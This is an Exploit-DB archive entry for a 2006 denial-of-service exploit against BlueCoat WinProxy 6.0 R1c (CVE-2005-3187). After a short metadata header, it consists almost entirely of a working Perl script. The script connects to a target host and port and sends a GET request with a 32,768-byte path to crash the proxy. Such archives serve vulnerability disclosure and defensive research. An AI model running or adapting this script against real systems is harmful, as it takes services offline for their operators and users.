BlueCoat WinProxy <= 6.0 R1c GET Request Denial of Service Exploit

2006-01-07T00:00:00
ID EDB-ID:1409
Type exploitdb
Reporter FistFuXXer
Modified 2006-01-07T00:00:00

Description

BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit. CVE-2005-3187. Dos exploit for windows platform

                                        
                                            #!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author:  FistFucker
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;


print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";

$sock = IO::Socket::INET-&gt;new
(

    PeerAddr =&gt; $ip,
    PeerPort =&gt; $port,
    Proto    =&gt; 'tcp',
    Timeout  =&gt; 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";

$sock-&gt;send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");

print "[+] DoS string has been sent.";

close($sock);

# milw0rm.com [2006-01-07]